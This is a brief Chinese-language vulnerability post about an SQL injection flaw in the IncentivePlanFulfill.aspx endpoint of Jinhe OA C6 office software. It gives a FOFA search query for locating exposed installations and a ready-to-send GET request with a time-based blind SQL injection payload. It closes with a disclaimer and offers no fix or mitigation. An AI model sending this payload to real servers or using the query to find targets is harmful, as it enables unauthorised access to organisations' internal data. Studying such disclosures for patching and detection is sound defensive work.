0x01 产品简介
金和OA协同办公管理系统C6软件(简称金和OA),本着简单、适用、高效的原则,贴合企事业单位的实际需求,实行通用化、标准化、智能化、人性化的产品设计,充分体现企事业单位规范管理、提高办公效率的核心思想,为用户提供一整套标准的办公自动化解决方案,以帮助企事业单位迅速建立便捷规范的办公环境。
0x02 漏洞概述
金和OA协同办公管理系统C6软件 IncentivePlanFulfill.aspx 接口存在SQL注入漏洞,攻击者可以通过该漏洞执行任意sql语句。
0x03 测绘语句
fofa: app="金和网络-金和OA"
0x04 漏洞复现
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1WAITFOR+DELAY+%270:0:3%27--&TVersion=1 HTTP/1.1
0x05 影响范围
金和OA协同办公管理系统
0x06 免责声明
本文所涉及的任何技术、信息或工具,仅供学习和参考之用。
请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。
作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。